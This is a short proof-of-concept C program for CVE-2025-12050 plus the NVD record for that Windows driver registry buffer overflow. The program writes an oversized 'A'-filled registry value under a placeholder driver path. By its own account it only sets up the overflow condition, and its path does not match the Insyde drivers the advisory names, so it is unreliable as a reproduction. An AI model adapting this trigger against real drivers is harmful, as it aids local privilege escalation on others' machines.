CVE-2025-12050

// CVE-2025-12050 PoC - Registry Buffer Overflow Trigger // This PoC demonstrates the concept of triggering a buffer overflow // through malicious registry values read by drivers using RTL_QUERY_REGISTRY_DIRECT #include <windows.h> #include <stdio.h> #define MALICIOUS_REG_PATH "SYSTEM\\CurrentControlSet\\Services\\VulnerableDriver" int main() { HKEY hKey; DWORD dwDisposition; printf("[*] CVE-2025-12050 Registry Buffer Overflow PoC\n"); printf("[*] Target: Driver using RTL_QUERY_REGISTRY_DIRECT\n\n"); // Create or open the target registry key LONG lResult = RegCreateKeyExA( HKEY_LOCAL_MACHINE, MALICIOUS_REG_PATH, 0, NULL, REG_OPTION_VOLATILE, KEY_WRITE, NULL, &hKey, &dwDisposition ); if (lResult != ERROR_SUCCESS) { printf("[-] Failed to create registry key. Error: %d\n", lResult); return 1; } printf("[+] Registry key created/opened successfully\n"); // Create a malicious value with oversized data // This simulates the overflow condition that the driver will trigger char maliciousData[4096]; memset(maliciousData, 0x41, sizeof(maliciousData)); // Fill with 'A' lResult = RegSetValueExA( hKey, "MaliciousValue", 0, REG_BINARY, (LPBYTE)maliciousData, sizeof(maliciousData) ); if (lResult == ERROR_SUCCESS) { printf("[+] Malicious registry value written successfully\n"); printf("[+] Value size: %d bytes\n", sizeof(maliciousData)); printf("[*] When driver reads this value via RTL_QUERY_REGISTRY_DIRECT,\n"); printf("[*] it may trigger buffer overflow if buffer is smaller\n"); } RegCloseKey(hKey); printf("\n[*] Note: This PoC creates the registry conditions but actual\n"); printf("[*] exploitation requires specific driver with vulnerable code.\n"); return 0; }

{"cve": {"id": "CVE-2025-12050", "sourceIdentifier": "8338d8cb-57f7-4252-abc0-96fd13e98d21", "published": "2026-01-14T01:15:49.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The drivers in the tool packages use RTL_QUERY_REGISTRY_DIRECT flag to read a registry value to which an untrusted user-mode application may be able to cause a buffer overflow."}, {"lang": "es", "value": "Los controladores en los paquetes de herramientas usan el indicador RTL_QUERY_REGISTRY_DIRECT para leer un valor de registro al cual una aplicación en modo de usuario no confiable podría ser capaz de causar un desbordamiento de búfer."}], "metrics": {"cvssMetricV31": [{"source": "8338d8cb-57f7-4252-abc0-96fd13e98d21", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "8338d8cb-57f7-4252-abc0-96fd13e98d21", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://www.insyde.com/security-pledge/sa-2025010/", "source": "8338d8cb-57f7-4252-abc0-96fd13e98d21"}]}}